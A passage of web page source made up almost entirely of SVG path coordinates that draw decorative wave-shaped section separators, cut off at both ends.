d=\"M930.3,16.8a43.92,43.92,0,0,0-7.3-1.1c1.9.3,6.6,1.2,7.4,1.3C929.1,16.8,929.7,16.8,930.3,16.8Z\"></path>\n <path d=\"M921.6,10.5c3,1.2-5.7-.2-1.5,1C919.7,11,927.3,11.8,921.6,10.5Z\"></path>\n <path d=\"M1610.4,41.7c1.3-.6-.6-.4-3.6-.6-.1-.1-.2-.1-1.1-.1.1.1.1.2.2.3C1610.6,41.1,1608.7,42.1,1610.4,41.7Z\"></path>\n <path d=\"M1599.6,41.3c1.8,0,3.3.1,4.3.2C1604.4,41.1,1599.1,40.8,1599.6,41.3Z\"></path>\n <path d=\"M1575.5,44.5c-.8.4,1.8,1.1,4.7.8C1575.8,45.1,1580.3,44.7,1575.5,44.5Z\"></path>\n <path d=\"M934.8,31.5a24.37,24.37,0,0,1-2.7-.1c-1.9-.3-2.4-.6-5-1a17.39,17.39,0,0,0,3.9.9h-1.4c-.1.3,2.4.3,4.5.4C933.8,31.6,934.2,31.5,934.8,31.5Z\"></path>\n <path d=\"M916.9,31.4c1.1,0,2.1,0,3.2.1.8-.3-3.4-.2-5.5-.3,1.1.2-.4.3-1.2.4-.1,0-.2-.1-.4-.1h-.1c0,.1.1.2.1.3s.1.2.2.3c1.6.3,2.7.6,4.3.9-1-.5,1.3-.1.8-.4-3.5-.7-.6.3-4.1-.5-.2-.1,0-.3-.4-.4H915C916.7,31.7,915.4,31.4,916.9,31.4Z\"></path>\n <path d=\"M1598.8,48c.3.7,1.4.8.9,1.3C1603.6,49.2,1601.2,48.2,1598.8,48Z\"></path>\n <path d=\"M1592.1,49c.7.4,0,.6-.5.9C1595,49.9,1595.8,49.1,1592.1,49Z\"></path>\n <path d=\"M1517.1,49.7c-4.1,0-3-.5-5.7-.7.8.5.9.7,3.9,1.2C1516.3,50.1,1516.1,49.9,1517.1,49.7Z\"></path>\n <path d=\"M1681.5,54.1c2.2-.1-.6-.7-2.6-.8C1681,53.7,1678.1,54.1,1681.5,54.1Z\"></path>\n <path d=\"M1561.2,51.4c1.9.6-.8,1.2.2,1.9,2.6.1,5.1.1,6.3,0C1563.5,52.8,1568.4,51.8,1561.2,51.4Z\"></path>\n <path d=\"M1514.2,54.9c.7.4-.8.9,2.8,1C1514.1,55.5,1518.7,55.1,1514.2,54.9Z\"></path>\n <path d=\"M1488.4,55.5c5.5,0,3.5.6,7.8.7-2.8-.6-3.3-.9-2.9-1.3C1492.4,55.2,1489.3,55.2,1488.4,55.5Z\"></path>\n <path d=\"M1568,56.9a20.32,20.32,0,0,0-4.6-.5A9.14,9.14,0,0,0,1568,56.9Z\"></path>\n <path d=\"M1516,56c-1.7.1-.6.6,1.5.7-.1-.1,1.8-.1,2-.2C1515.4,56.6,1518.8,56.1,1516,56Z\"></path>\n <path d=\"M1471.7,55.6c-1.4,0-2.8-.1-4.3-.1a5.58,5.58,0,0,0,2.6.8C1472.3,56.2,1472.3,55.9,1471.7,55.6Z\"></path>\n <path d=\"M1474.6,56.8c-2-.4,3.4-.8-1.6-.9,1.4.6-.8.7-2.5.9C1472.5,56.9,1472.7,56.8,1474.6,56.8Z\"></path>\n <path d=\"M1519.1,57.6c-2.5-.1-2.6-.3-1.4-.5-1.1,0-2.1,0-3.2-.1C1513.4,57.5,1517.5,57.9,1519.1,57.6Z\"></path>\n <path d=\"M1570.1,58.6c.1.2-2.4.6.5.8C1570.5,59.2,1573.1,58.8,1570.1,58.6Z\"></path>\n <path d=\"M1517.2,57.9c.4.4,1.2.7,4.7.8C1521.4,58.3,1518.7,58.2,1517.2,57.9Z\"></path>\n <path d=\"M1418,56.7c2.3.1,2.5.3,2.5.6,1.6,0,3.9.1,4.2,0-3.3-.2-3.6-.4-1.4-.6A29.32,29.32,0,0,0,1418,56.7Z\"></path>\n <path d=\"M1565.7,59.8c.2.6,6.9.3,7.4,0C1569.6,59.7,1569.4,60,1565.7,59.8Z\"></path>\n <path d=\"M1514.9,59.2c5,.2,4.7.1,8.6.4,0-.1.1-.1,1-.1,0-.1-.1-.1-.1-.2C1521.7,59.2,1516.5,58.9,1514.9,59.2Z\"></path>\n <path d=\"M1401.7,57.6c-2.5.7,13.8.6,9.6.2C1409.8,58,1403.9,57.7,1401.7,57.6Z\"></path>\n <path d=\"M1481.8,59.7c-.5.2-1.4.2-1.8.4,2,0,2.4.2,4.3.2C1484.3,60,1484.1,59.8,1481.8,59.7Z\"></path>\n <path d=\"M1537,60.9c-.1.5-1.2.7.7,1,.9-.2,4.6-.1,3.9-.5C1539.9,61.3,1540,61,1537,60.9Z\"></path>\n <path d=\"M1190,54.5c.1-.2,1.6-.2,1.9-.3-5.3.1-2.5-.2-6.5-.4,2.6.5-1,.7-.2,1.3,4.2.1,11.3-.3,5.8-.8C1191.2,54.6,1190.7,54.7,1190,54.5Z\"></path>\n <path d=\"M1516.7,61.8a8.24,8.24,0,0,0-3.6-.7C1513.7,61.4,1513.4,61.8,1516.7,61.8Z\"></path>\n <path d=\"M1395.9,59.9c4.2.2,6.4-.3,3.8-.6C1400.2,59.7,1396.4,59.6,1395.9,59.9Z\"></path>\n <path d=\"M1474.1,63.9c4.2-.5,8.4-1.6,4.5-2.7C1479.7,62.3,1473.1,63.1,1474.1,63.9Z\"></path>\n <path d=\"M1355.1,60.1c-4.5,0-1.6-.7-6.7-.7,2.2.5,6.2,1.2.9,1.4,1.7.2,4.6.1,6.4.1C1353.9,60.6,1355,60.5,1355.1,60.1Z\"></path>\n <path d=\"M1360.4,60.1h-2.1c.1.1-.8.1-.9.2,2.1.1,2.8.3,5.5.3,1.4-.4-3.7-.1-3.4-.4C1360,60.2,1360.6,60.2,1360.4,60.1Z\"></path>\n <path d=\"M1114.1,55.5a60.9,60.9,0,0,0-7.4,0c2.8.3,2.8.6-.6.6C1112.2,56.5,1113.4,56,1114.1,55.5Z\"></path>\n <path d=\"M1295.9,59.3c.7.2-.9.6,1.5.7C1298.2,60,1299.7,59.3,1295.9,59.3Z\"></path>\n <path d=\"M1452.1,64c-.8-.3-1.3-.6-4.6-.6C1445.9,63.5,1448,64,1452.1,64Z\"></path>\n <path d=\"M1451.1,64.1c-.1.4,2.6.5,3.6.7,1.9-.2-1-.3-.4-.7Z\"></path>\n <path d=\"M1563.4,80.3c-1.6.1-.1.5,1.5.7C1565.7,80.9,1567.2,80.2,1563.4,80.3Z\"></path>\n <path d=\"M1551,82.2c.1.5-2.5.7-3.5,1.1a23.4,23.4,0,0,0,6.2-.1c-1.2-.1-2.3-.3-3.4-.4C1552.3,82.9,1554.5,82.1,1551,82.2Z\"></path>\n <path d=\"M1535.9,89.5h0c5.3-.1,8-.5,9.8-1-2.3-.2-4.7-.1-7.6-.4C1539.5,88.8,1533,89,1535.9,89.5Z\"></path>\n <path d=\"M1400.3,58.5a16.38,16.38,0,0,0,2.2.3C1401.9,58.7,1401.1,58.6,1400.3,58.5Z\"></path>\n <path d=\"M1616.7,41.6c-1.3,0-2.5,0-2,.2,6,.1,2.4-.5,1.7-.6C1615.2,41.3,1615.3,41.5,1616.7,41.6Z\"></path>\n <path d=\"M1591.6,41.9c.2-.5,7.7-.2,2.7-.7,2.6-.1,10-.6,2.5-.9C1595.2,40.7,1590.5,41.4,1591.6,41.9Z\"></path>\n <path d=\"M1594.6,43.3c1.8-.3.8-1.3,6.8-.8,0-.3-3.2-.3-4.5-.5-1.4,0,.1.4-1.8.4-1.3,0-1.3-.2-1.3-.4a37.36,37.36,0,0,0-4.1.1c5,0,1.3.5,4.8.9a28.68,28.68,0,0,1-5.4-.2c0-.1,1.3-.1.9-.3-4.5.2-3-.4-6.7-.6-2.1.2,1,.4,2.5.6a19.52,19.52,0,0,1-5.9.6c-.1-.2-1-.3-2.3-.4-1.1.1-3.3.2-2.8.5,2.6.1,2.2-.2,5.2,0-3.1.2,1.1.5-4,.2-.2.3-1.8.4.4.7,2.1-.1,4.2-.1,6.2-.2-1.6-.1-1.2-.3-1.4-.5,3.3.2,1.7-.2,1.8-.4h3.1c.1.3.9.6,2.6.8.5-.3,3.1-.1,4.3.1.2-.3,6.9-.3,3.7-.7A7,7,0,0,1,1594.6,43.3Z\"></path>\n <path d=\"M1695,42.7c-1.3.4-3.1.7-7,.5,2,.1,1,.4,3.4.4,1-.2,4.2.2,5.2-.1C1691.4,43.3,1697.6,42.9,1695,42.7Z\"></path>\n <path d=\"M1564,54.1c3.9.3,3.2,1.4,3.3.2-.3-.2-4.1-1-2.5-.6C1565,53.9,1564.8,54,1564,54.1Z\"></path>\n <path d=\"M1473.5,55a5.11,5.11,0,0,0,2.4.5c3.8,0-3.3-1.5,4.7-.9-.3-.4-2.3-.9-1.5-.7-.7.4-2.3,0-4.3-.1C1472,54.2,1478.2,55,1473.5,55Z\"></path>\n <path d=\"M1301.6,58.5c.2.1,1.5.2,1.3.4a7.36,7.36,0,0,0-3.1,0c1.7,0,.8.3,2.3.4C1303.9,59.1,1304,58.3,1301.6,58.5Z\"></path>\n <path d=\"M1498.8,64.8c1.1.1,4,.1,3.4.4-.6,0-1.2.1.1.1.7-.3,1.5-.1,4.2,0,1.4-.4-3.7-.1-3.4-.4,1.8,0-1.6-.4,3-.3,2.7.1,1.8.5,4.5.5,1.7-.1-.1-.6,1.6-.7-5.3,0-3.6-1.5-10.7-2C1499.8,63.4,1501,64.2,1498.8,64.8Z\"></path>\n <path d=\"M1492.8,65.3a18.25,18.25,0,0,1-3.3-.3c-2.4.2,1.9.3,2.5.6-.4,0-5.1.1-2,.2,1.4,0,1.4-.1,3.1,0C1493,65.4,1491.2,65.5,1492.8,65.3Z\"></path>\n <path d=\"M1567.4,82.7c.4-.3.1-.5-3.8-.6-.2.2-.1.3,0,.5-11.8.6-10.3,2.7-18.2,3.8,3,.1,2-.2,4.1-.1,2.9.4-.3.6.7,1,3.8-.2,6.4-.5,8.9-.8,2.3.1,3.2.3,6.5.4C1570.7,85.8,1580.1,83.8,1567.4,82.7Z\"></path>\n <path d=\"M1541.6,87c1.1.2,4.4.2,3.6.6-4.3,0-5.3-.2-6.6-.5,1,.4-1.6.3-.6.6,5.3.1,6.7-.2,10.3-.2a6.85,6.85,0,0,1-2.7-.9A15,15,0,0,0,1541.6,87Z\"></path>\n <path d=\"M1349.4,59.4c3.9.3.4-.4,3-.3-.7.7,3.9.3,1.6.9,6.3-.1,3.7-1.3-2.1-1.6.4-.3,4.1-.7,1.5-1a12.2,12.2,0,0,1-6-1.2c1.6,0,4,.1,4.2,0-8.7-.2-4.5-1.6-8.6-1.9C1343.5,56.1,1351.5,57.7,1349.4,59.4Z\"></path>\n <path d=\"M1448.4,72.8c1.8,0,3.5.1,5.3.1,6.1-.5-3.1-1.7,2-1.8-7.4-.3-3.4-1-8.2-1.4,2.5-.2,5.2.2,6.2-.1-1.6-.5-8.1-.6-8.2-1.3,2.1,0,1.1-.3,4.1-.1-1.7-.5-.6-.5.5-.9-7.1-.5-.5-1.9-9-2.5,2.5.9,7.8,3.1-.9,3.4a14.08,14.08,0,0,0-4.2,0c1.6.1,4.2.2,3.5.5-12.8.2-2,2.7,2.3,3.5-1,0-2.07,0-3.1,0,4.2.3,5.2.8,9.1,1.1C1449.8,73.2,1449.3,73,1448.4,72.8Z\"></path>\n <path d=\"M1579.1,77c-1.8,0,.4.5-1.8.5s-1.5-.3-4.4-.3c.9.3-2.1.2-3,.3,2.5.7-.3.7-2.5,1,.5.2,3,.3,3.5.5-2.3.4-6.6.5-7.7,1,6.4.2,5.1-.2,11.5-.1.5-.3-.2-.8,2.6-.8-.6.4,1.3.5,3.6.6-.7-.4-.7-.8,2.7-.7C1583.3,78.2,1581.9,77.6,1579.1,77Z\"></path>\n </svg>\n </div>\n <div class=\"h-separator\" style=\"height: 121px; bottom: 0px;\">\n <svg style=\"fill:white;transform:rotateX(180deg);\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1920 120.77\" preserveAspectRatio=\"xMidYMax slice\">\n <path d=\"M569.37,67.57c1.56,0,2.79.05,4,0,1.43-.07,2.86-.24,4.29-.36A24,24,0,0,0,574,64.28C570.65,62.58,569.09,63.81,569.37,67.57Z\" transform=\"translate(0 0)\"></path>\n <path d=\"M571.07,60.51l-3.93-.7-.24,3,4.09-.37C571,61.82,571,61.17,571.07,60.51Z\" transform=\"translate(0 0)\"></path>\n <path d=\"M602,70.4c1.74.47,3.51.81,5.28,1.17l.39-2.1-5.51-.87A9.61,9.61,0,0,0,602,70.4Z\" transform=\"translate(0 0)\"></path>\n <path d=\"M474.07,102c-2.15-.7-4.42-1-5.84,2.23,2.34.53,4.31,2.49,6.5.22A2.79,2.79,0,0,0,474.07,102Z\" transform=\"translate(0 0)\"></path>\n <path d=\"M799.31,23c-.71-.12-1.29-1-2-1.17-1.14-.21-3.19-.42-3.36,0a12.07,12.07,0,0,0-.71,4.87,4.59,4.59,0,0,0,3.1.52c2.12-.83,3.24-.36,3.73,1.81.19.88.13,1.95.62,2.58a5.36,5.36,0,0,0,2.64,1.81c.37.1,1.11-1.18,1.63-1.76C803.7,28,804.22,23.75,799.31,23Z\"\n transform=\"translate(0 0)\"></path>\n <path d=\"M13.9,65.4l-.6-1.25c-1.06-2.59,1-4.49,4.66-4.33,8.51-.84,17-1.62,25.52-2.54,2.1-.23,4.14-1.27,6.22-1.3A66.38,66.38,0,0,1,58,56.8l1.31-.23A7.68,7.68,0,0,1,67,54.46a3.11,3.11,0,0,0,2.58-.66,5.37,5.37,0,0,1,6.17-1.43,2,2,0,0,0,1,.2q8.63-1.38,17.24-2.8c2.43-.4,4.84-1,7.29-1.15s5.08-.07,7.63-.08l17.77,0c.67,0,1.66.31,2,0,2.76-3,5.81-1.26,8.83-.74,3.65.63,4.85-.35,5.7-3.95.24-1,1.18-2.59,1.78-2.58a4.87,4.87,0,0,1,3.17,1.67c1.67,1.9,2.95,4.14,4.57,6.09a4.51,4.51,0,0,0,2.55,1.41,24.07,24.07,0,0,0,6.73.53c6.42-.86,12.56.17,18.8,1.53,3.93.85,8.09.6,12.13,1,3.2.33,6.38.93,9.58,1.41l14,2.19c1.59-.23,3.22-.8,4.77-.64,5.65.6,11.29,1.4,16.92,2.21,1.75.25,3.44.88,5.2,1.13,3,.41,6,1.06,9,.87s5.86-.94,8.74,1.16c.81.59,3.42-.53,4.71-1.52,1.76-1.35,3-1.64,5.11-.57,2.44,1.22,5.3,1.6,8.24,2.42.28-2.43.38-4.31.76-6.12a2.21,2.21,0,0,1,1.5-1.47c.49,0,1.26.79,1.54,1.4,1.48,3.31,3.71,4.81,7.51,4.46,4.43-.41,8.85-1.07,13.27-1.57A4.73,4.73,0,0,1,306,59c5.66,2.7,11.74,3.44,17.88,3.9.11,0,.25,0,.33,0,4.79,3.34,10.15,4.24,15.85,3.8.12,0,.26.33.4.51l1.34.53,2.1,1.4,2.6-1.71c.92-.41,1.93-1.31,2.73-1.16,1.83.36,3.65.81,5.48,1.14,4.16.74,8.33.8,12.54-2.69L366,69.46l5.8-2.54,5.48-2.41c-3.7-1.64-4.16-4.87-4-8.14a5.29,5.29,0,0,1,.88-2.44c1.07,1.15,2.13,2.3,3.21,3.45,1.76.14,3.51.31,5.26.47a24.63,24.63,0,0,1,1.44,4c.35,1,.65,2,1,3a12,12,0,0,0,2.57-1.65c2.29-2.46,2.93-.14,3.93,1.23l3.46-.87c.73-1.42,1.34-2.92,2.12-4.31l3.08.31c1.89.2,3.68,1.35,5.51,2.06l24.57,3.25c.33,0,.73-.08,1,0,7.53,3.52,15.78,1,23.59,2.89,6.56,1.6,13.44,1.92,20.18,2.81q5.69.45,11.36.88c1.22.08,2.44.09,3.66.14l.78-2c0-.68.05-1.35.08-2q1.28-3.8,2.53-7.59l.94-1.85,4-3c-1.83-.66-3.78-2.12-5.41-1.83-6.92,1.23-13.43-1-20.11-1.79a88.07,88.07,0,0,1-12.06-2.33A47.15,47.15,0,0,1,484,46.55h2.76l6.75.09h1.36L507.12,48l1.32,0,19.06,2h2.06l34.16.94,1.29-.43c3.65-2.87,7.6-2.47,11.64-1.06l2.08.28,1.23-.66,6.83-3.34c.21-.26.41-.71.64-.73,3.29-.25,6.59-.45,9.89-.64.13,0,.28.31.42.47l1.27.4c2,.15,3.07-3.37,5.53-1.37,2.37.12,4.73.25,7.1.34a6.49,6.49,0,0,0,3.64-.67l4.89,2.91a45.17,45.17,0,0,1-.64-4.91c-.11-4.8-.06-4.8-4.91-5.68-2.86,1.84-4.63,1.26-6.9-1.64a35,35,0,0,0-4.6-4.14L600,33.41c-.19,1.18.12,3.44-.83,4.27-1.64,1.44-4,2-5.94,2.85-.52-2.28-.42-4-1.25-4.78-.65-.59-2.49.35-3.7.11a45.78,45.78,0,0,1-5.58-1.79c-2.06.67-4.09,1.71-6.19,1.84-.78.05-1.69-2-2.55-3.08-.84,0-2-.41-2.46,0a9.67,9.67,0,0,0-2.74,3.41c-1.11,2.69-2.92,2.32-5.24,2.08-5.1-.51-10.26-.56-16-.84.14.23-.21-.32-.52-.89-1.87-3.42-2.7-3.45-5.28-.44a4.91,4.91,0,0,1-2.4,1.38c-1.74.47-3.55.7-5.33,1l.15.91-3.69-1.58c.27-2,.49-3.68,3.37-4,1-.12,2.5-2.31,2.49-3.53,0-3.35,1.14-4.84,4.5-5.42,2.74-.48,5.26-2.07,8-2.84,3.69-1.05,7.49-1.69,11.2-2.67,8.15-2.14,16.27-4.4,24.41-6.56a7,7,0,0,1,3.33-.25c5.24,1.31,10-.23,14.91-1.84,3.07-1,6.29-1.54,9.45-2.28h2c5.23-.29,10.46-.6,15.7-.83.86,0,1.77.44,2.6.31,4.53-.71,9-1.53,13.55-2.35,1.54-.28,3.06-.67,4.87-1.06,1,3,3.55,2.85,6,2.06,8.74-2.89,17.68-3.48,26.8-2.94,6.21.37,12.45.32,18.67.68,1.39.08,2.73,1.1,4.09,1.68C709,5,711.7,2.68,714.63,5.67a1,1,0,0,0,1-.09c3.33-3.17,7.5-2.06,11.32-2,15.24.32,30.54.25,45.71,1.53,17.76,1.49,35.42,4.22,53.11,6.46a79.56,79.56,0,0,1,9,1.52,34.57,34.57,0,0,1,5.42,2.36c2.63-3.91,6.11,0,9.47.45l1.28.27c15.94,3.63,31.9,7.22,47.83,10.93,3.21.75,6.31,2,9.46,3.05l1.33.23q10.69,3.14,21.41,6.26c4.35,1.26,8.73,2.42,13.07,3.7,5.72,1.69,11.4,3.5,17.13,5.15,2.37.69,5.11.57,7.19,1.72,6.21,3.44,12.72.42,19,1.37s12.79,1.39,19.21,1.87c8,.58,16,1.29,23.93,1.35a132.33,132.33,0,0,0,17.88-1.43c1.88-.24,3.6-1.73,5.4-2.65,1.62-1.12,3.8-1.93,6-3.77,2.88-3.15,6.07-2.08,9.72-2.38,2.19-.18,4.34-.75,6.51-1.12a49.53,49.53,0,0,1,5.76-.89c2.43-.15,5-.75,7.3-.27a6.77,6.77,0,0,1,3.62,2.76,57.36,57.36,0,0,1,3.5,6.27,1.17,1.17,0,0,0,1.25.22c4.37-5,4.16-5.45,9-.47a8.74,8.74,0,0,0,5.33,2.21c5.07.32,6.5,2.41,4.33,6.9a26.08,26.08,0,0,0-1.58,4.47c-.91,3.32-.07,3.48,3.39,2.65l1.22,0,2.2,0c3.32-1.9,6.71-2.49,10.37-.87a5.91,5.91,0,0,0,2.61,0c2.11-.17,4.22-.49,6.33-.54,4-.08,8.08,0,12.12,0,7.89.08,15.79.14,23.68.32,6.09.13,12.19.29,18.27.68,7,.45,13.91,1.25,20.88,1.76,2.92.21,5.87,0,8.8.06a13.19,13.19,0,0,1,4,.24c6.31,2.22,12.79,2,19.37,2.17,10.34.27,20.68,1.3,31,2.58,3,.37,6.89-12.55,9.18-11,1.32.89,12.9,3.57,12.9,3.57s.31-8.06,15.63-1.73c.66.27,10.09-4.48,10.79-4.37.44.14,1.15,2.47,1.58,2.61,1.42.17.69-7.18,2.11-7.2,16.22-.26,15.65.29,15.23.43l4.25-1.2s8.6-5.21,12.58-5.19a7.81,7.81,0,0,1,.94-1.51,4.11,4.11,0,0,0,.46.94c.33.5,2,.15,3,.14l.12,0c2,3.77,3.14,11,3.63,4,.07-1.21.31-3.35.7-6.28,3-.77,6.13-.13,9.28.62a7.88,7.88,0,0,1,2.6.64,4.88,4.88,0,0,1,2,2.31,60.15,60.15,0,0,1,1.34,6.22c4.32-1.57,8-2,12.06-.48,2.13.78,4.92-.48,7.38-.33s4.66.92,7.54,1.54c.72-1,1.81-2.64,2.82-4.13l4.43,3.18,0,0c.25-.81.51-1.61.76-2.42,1.93.71,3.59,1.21,5.14,1.92a4.61,4.61,0,0,0,5-.26c.59-.41,2-.08,2.78.29,3.84,1.71,7.59,2.6,11.47.11a2.26,2.26,0,0,1,1.89.12c4.53,2.45,9.29,2.22,14.13,1.42a3.25,3.25,0,0,1,1.64.14c5.87,2.35,11.49.87,17.18-.85a11.57,11.57,0,0,1,5-.06c2.39.4,4.72,1.66,7.09,1.67,3.16,0,4.21,1.44,4.1,4.6,1.12-2,1.7-4,3-5.11s3.43-2,5,.87c-1.25,1.36-2.58,2.81-4.34,4.75l5.16.85c2.4-4.06,3.67-4.4,8.55-3.34,1.08.24,2.49-.73,3.68-1.29,1-.47,2.23-1.88,2.76-1.63,3.59,1.73,8.2,1.09,11,4.73.5.64,1.75.76,2.69,1,1.16.26,2.36.37,3.54.54l1.73-1c.19-.27.45-.8.55-.77,2.78.8,4.73-.29,6.38-2.48a3.27,3.27,0,0,1,2.34.91c1.38,2,2.94,2.06,5.24,1.75,3.19-.43,6.51.16,9.76,0,2.6-.09,5.18-.8,7.78-.85a38,38,0,0,1,9.55.55c2.58.62,4.75,1.12,7.47.28,2.24-.69,4.92,0,7.4.15,2.91-1.39,5.85-2.73,8.73-4.18,2.7-1.37,5.19-3.5,8.64-1.62.21-3.15,2.3-3.62,4.6-3.8,5-.54,10-1.12,15-1.55.75-.07,1.56.56,2.34.86l1.19.25c4.38-1.37,5.63-1,8.1,2.84,1.7,2.64,4.23,3.13,7,3.14,5,0,5.52.61,4.39,5.07-.7,2.76.68,4.28,3.32,3.67,3.21-.74,4,.15,5,5.53a9.44,9.44,0,0,0,2.19-.11c4-1.13,4.94-.62,6.42,3.34.38,1,.92,2,1.39,3a28.51,28.51,0,0,1,15.36,3.26,26.81,26.81,0,0,0,7,3c1,.21,2.45-1.48,3.7-2.3-.13-.31-.25-.63-.38-.94,1.71.44,3.42.86,5.13,1.31,2.25.58,4.25,1.89,6.69-.37,1.57-1.45,3.87-.37,5.21,1.56a.38.38,0,0,1,.25.27c2.24,1.52,7.57,1.76,9.59.42,2.33-1.55,3.63-.44,4.84,1.62,1.83,3.13,3.85,6.14,5.79,9.2l.67.18,2.77-.67h0c.6-1.35.88-3.39,1.88-3.84s2.62.88,4,1.37c1.18.43,2.38.8,3.57,1.19l.72-.74c-.37-1.73-.75-3.47-1.12-5.2l.63-.64c1.89,1.52,3.79,3,5.9,4.71l1-3.54,5,5.65c.67-2.08,1-3.29,1.59-5l7.26,7.64,4.83-3.54c.84,1.18,1.84,2.57,2.4,3.34,2-.65,3.7-1.25,5.41-1.7,2.5-.66,5-1.2,7.54-1.8l1.31-.91c0-.48.11-1,.23-2l1.08,1.71.76.53a15.34,15.34,0,0,0,9.54,4.36l1.86-1c.08-1.19.16-2.38.29-4.23,2.22,1.5,3.32,5.15,6.44,2.81L1815,92c2.37-1,4.78-1.88,7.06-3a13.68,13.68,0,0,0,2.71-2.53c.27.13.93.26,1,.53,1,4.54,5.54,4.74,8.52,6.81a2.14,2.14,0,0,0,2.07-.29c1.54-2.23,3.15-1.64,4.89-.42l1.45.44,8,.57.95-1.13c2.4,1.21,4.47,4.12,7.25.82.12-.15,1,.49,1.46.44,2.68-.26,5.39.31,7.94-1.61,1.18-.89,3.71-.85,5.22-.23,2.13.87,3.88,2.66,6,4.25,2.45-2.2,5.24-3,8.11-.22a1.27,1.27,0,0,0,.94.32c7.53-1.47,11.48,4,16.11,8.24l1.19.76.25.16c2.4-.85,4.72-2.61,7.11-3.61a16.85,16.85,0,0,0,5.31-.39,7.17,7.17,0,0,1,1.47.73V0H0V61.35C7.17,64.37,14.69,67.61,13.9,65.4Z\"\n transform=\"translate(0 0)\"></path>\n <path d=\"M578.73,49.78c-.71.36-1.4.75-2.11,1.12C577.33,50.53,578,50.14,578.73,49.78Z\" transform=\"translate(0 0)\"></path>\n <path d=\"M1346.24,53l-.13,0Z\" transform=\"translate(0 0)\"></path>\n <path d=\"M1366.87,57.76c-.79-.16-1.57-.35-2.35-.56q-.45,1.17-1,2.37a11.27,11.27,0,0,1,3.33,2.15A5.14,5.14,0,0,1,1366.87,57.76Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1358.64,55.7c-2.72-.47-5.42-1.38-8.11-2.09a20.91,20.91,0,0,0-5.31,1.38l-2.37-2.32a49.11,49.11,0,0,1-9.39-.28c-1.41-.22-2.83-.34-4.24-.51.42.31.8.8,1.27.91,4.07,1,7.9,2.53,12.35,2.59,4.94.07,9.84,2,14.78,3.07,1.64.35,3.48.1,5,.73l.74.33c-.23-.94-.46-1.88-.7-2.84A37.55,37.55,0,0,0,1358.64,55.7Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1048.36,50.39a132.31,132.31,0,0,1-17.87,1.43c-8-.06-16-.76-23.94-1.35-6.42-.48-12.86-.91-19.21-1.87s-12.83,2.07-19-1.37c-2.08-1.15-4.82-1-7.19-1.72-5.73-1.65-11.41-3.46-17.13-5.15-4.34-1.28-8.72-2.44-13.07-3.7q-10.73-3.1-21.41-6.26c0,.49.11,1,.17,1.49l.15.16,4.5,2.05c8.53-.06,15.79,4.83,23.95,6.26a9.88,9.88,0,0,1,2.6,1.37l2.1.53c2.58.87,5.12,1.93,7.75,2.59,4.42,1.1,9,1.64,13.34,3,3.34,1.06,6.4,3,9.58,4.56l1.92.11c1.35-1.93,2.77-3.19,4.72-.6.24.31,1,.67,1.14.54,4.17-3,8.46,1.9,12.67-.18.41-.2,1.27.58,1.94.85s1.3.73,1.71.55c6.17-2.8,12-1.76,17.88,1.09,1.64.8,3.9.31,5.58,1,3.35,1.49,5.58.32,8.39-1.6,1.63-1.11,4.73-.09,7.16,0,.88,0,2,.42,2.58,0,3.47-2.14,7.39-1.74,11.14-2.29,2-1,5-.17,5.46-3.49l-2.17-.72C1052,48.66,1050.24,50.15,1048.36,50.39Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M593.88,22.35a11,11,0,0,0-2.19,4c-.27,1.18.34,2.56,0,4.16-.47-.63-1.3-1.23-1.35-1.89-.15-2.13-.47-3.36-3.23-2.79-.81.16-2.08-1.93-3-2.08l-13.75,3.14c.09,1.25.18,2.5.31,4.21l3.47-2.63c-.11,2.12-.16,3.26-.22,4.4.86,1.09,1.77,3.13,2.55,3.08,2.1-.13,4.13-1.17,6.19-1.84a7.84,7.84,0,0,1,2.46-.46c.81.12,2,1.24,2.25,1,2.3-2,4.45-1.47,7.06-.56,1.14.4,3.79-.72,4.26-1.8,1-2.32,2.63-2.12,4.42-2.16a35,35,0,0,1,4.6,4.14c2.27,2.9,4,3.48,6.9,1.64l2.9-2.16a28,28,0,0,0-4.47-.2c-2.5.27-3.81-.73-4.28-3.14-1.15-5.81-3.88-6.79-8.81-6.51-1.31.07-2.66-.83-4-1.23C595.25,22.46,594.08,22.08,593.88,22.35Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M840.13,15.47a34.57,34.57,0,0,0-5.42-2.36,79.56,79.56,0,0,0-9-1.52c-17.69-2.24-35.35-5-53.11-6.47-15.17-1.27-30.47-1.2-45.71-1.52-3.82-.08-8-1.2-11.32,2a1,1,0,0,1-1,.09c-2.93-3-5.59-.7-8.32.37-4.62.08-9.25.13-13.88.27a15.85,15.85,0,0,0-2.84.56,20,20,0,0,0,3.75.77c5.35.11,10.71.08,16.06.09L714.1,7c1.65.72,3.2,1.14,4.27-1a1.85,1.85,0,0,1,1.26-1c3.61.13,7.22.38,10.83.6l4,0,7.61.72,1.29-.11c1.7,0,3.4,0,5.09.17,1.53.15,3.28,1.13,4.53.66,7-2.64,14.1-.47,21.12-.67,4.07-.12,8.2,1.38,12.27,2.29.76.16,1.39.94,2.08,1.44h1.74c2.16-2.4,4.22-1.09,6.28.17l4-.62c5.66.68,11.33,1.34,17,2.05a5.11,5.11,0,0,1,1.43.7l4,0,2.16,1.18c2.65.24,5.3.69,8,.67a4.6,4.6,0,0,1,4.76,2.91,3.36,3.36,0,0,0,2,1c1.77-2.47,4.07-1.38,6.33-1.25,1.11.07,2.27-.75,3.4-1.17C846.24,15.49,842.76,11.56,840.13,15.47Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M377.36,57.38l3.48,3.7c2.16,0,4.31,0,6.46.1,2.56.18,5,1.74,7.54,2.67h.23q2-1.53,4-3.08a4.77,4.77,0,0,1-1.22,3.11c2.16-.47,4.32-.93,6.46-1.45a5.59,5.59,0,0,0,1.37-.82c-1.83-.71-3.62-1.86-5.51-2.06C392.6,58.76,385,58,377.36,57.38Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M368.88,56.73c-5.39-.38-10.86.29-16.23-.24-3.07-.31-5.38-.62-6.24,3-8.56-4.77-9.34-4.7-13.17,1.16,4.62-3.58,8.55-2.1,12.23,1.59.35.35,1,.36,1.58.52a20.12,20.12,0,0,0,3.44-1.34c3.29-2,6.73-3.32,10.6-2.59s7.48,1.71,11.22,2.57c2.84-.06,5.69-.22,8.53-.29l-3.48-3.7Q373.13,57,368.88,56.73Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n 